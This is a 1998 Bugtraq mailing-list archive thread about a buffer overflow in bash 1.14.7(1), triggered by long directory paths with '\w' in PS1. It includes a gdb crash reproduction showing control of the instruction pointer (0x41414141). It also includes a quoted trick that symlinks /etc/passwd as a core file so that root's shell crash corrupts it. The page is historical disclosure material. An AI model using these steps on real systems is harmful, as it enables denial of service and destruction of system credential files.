Bugtraq mailing list archives
Re: Buffer overflow in bash 1.14.7(1)
From: drazvan () KAPPA RO (Razvan Dragomirescu)
Date: Thu, 10 Sep 1998 20:37:54 +0300
Hello all, I'm posting this again, since the last message did not get through (Aleph, I think I'm entitled to this). The bug is quite old and has been reported by me to Bugtraq and Best-of-Security in August 1997. If it's about credits, you can read the original post at http://www.insecure.org/sploits/bash.pwd.overflow.html Thanks Razvan -- Razvan Dragomirescu KAPPA-NET Romania E-Mail: drazvan () kappa ro Alternate: drazvan () roedu net drazvan () romus ro Old: drazvan () romania ro drazvan () guv ro drazvan () lbi ro Home Phone: +(40)-1-686.66.21 -- Work Phone: +(40)-1-336.57.71 "Smile, tomorrow will be worse" (Murphy) On Thu, 10 Sep 1998, Fiji wrote:
ummm....I notified Redhat back on April 3 about this bug. It seems that they weren't too interested back then in doing anything about...and it looks like they aren't too interested now in giving credit where credit is due. <copy of original message> Date: Fri, 3 Apr 1998 09:56:13 -0500 (EST) From: Fiji <jfay () stetson edu> To: bugs () redhat com Subject: found a bug. Well it looks like if you cd into /proc/self/root/proc/self/root...692 characters later.../proc/self/root it will core. So what happens if I create a directory structure that is huge... i.e. ~fiji/ggggggggggggggggggggggggggggggggggggggggggggggggggggggg ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg ggggggggggggggggggggggggggggggggggggggggg/ggg and so forth. now at the bottom of this sturcture let's do the following: ln -s /etc/passwd ~fiji/g*/g*/g*/g*/g*/g* core now if root for whatever reason decides to cd into this...then the shell will die and core which will follow the symlink and corrupt /etc/passwd. Thought you all might like to know...so why exactly do cores follow symlinks? -Fiji CIT Stetson University Unix System Administrator </copy or original message> -Fiji On Fri, 4 Sep 1998, Joao Manuel Carolino wrote:Date: Fri, 4 Sep 1998 16:09:28 +0000 From: Joao Manuel Carolino <root () EINSTEIN DHIS EU ORG> To: BUGTRAQ () netspace org Subject: Buffer overflow in bash 1.14.7(1) If you cd in to a directory which has a path name larger than 1024 bytes and you have '\w' included in your PS1 environment variable (which makes the path to the current working directory appear in each command line prompt), a buffer overflow will occur. The following was tested on my machine, running Slackware 3.5: einstein:~# gdb bash [...] (gdb) r Starting program: /bin/bash bash# PS1='\w ' ~ cd /tmp /tmp mkdir `perl -e 'print "A" x 255'` /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` /tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'` /tmp cd AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
AA!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/(no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x804ed72 in sigprocmask () (gdb) backtrace #0 0x804ed72 in sigprocmask () #1 0xe9 in ?? () #2 0x41414141 in ?? () Cannot access memory at address 0x41414141. Regards, Joao
Current thread:
- Re: Buffer overflow in bash 1.14.7(1), (continued)
- Re: Buffer overflow in bash 1.14.7(1) Wichert Akkerman (Sep 05)
- Re: Buffer overflow in bash 1.14.7(1) Chet Ramey (Sep 08)
- sshd exploit? Navindra Umanee (Sep 05)
- Re: sshd exploit? Seth David Schoen (Sep 06)
- Reading read-protected devices in *BSD Hubert Feyrer (Sep 06)
- Re: Reading read-protected devices in *BSD Todd C. Miller (Sep 06)
- Re: Reading read-protected devices in *BSD Eivind Eklund (Sep 06)
- Re: Buffer overflow in bash 1.14.7(1) Wichert Akkerman (Sep 05)
- Another way to crash HP 5M/5N printers bwoodard () CISCO COM (Sep 05)
- Windows File Share Scanner ZyklonB Zombie (Sep 05)
- Re: Buffer overflow in bash 1.14.7(1) Fiji (Sep 10)
- Re: Buffer overflow in bash 1.14.7(1) Razvan Dragomirescu (Sep 10)
- Fw: Exploit for SCO. Leshka (Sep 10)
- Re: Fw: Exploit for SCO. John W. Temples (Sep 11)
- ISS Vulnerability Alert: Windows Backdoors Update X-Force (Sep 10)
- security problems with jidentd Mitchell Blank Jr (Sep 10)
- Re: security problems with jidentd Scott Fuhrman (Sep 11)
- Cisco security notice: Cisco PIX and CBAC Fragmentation attack psirt () cisco com (Sep 11)
- Re: Buffer overflow in bash 1.14.7(1) //Stany (Sep 05)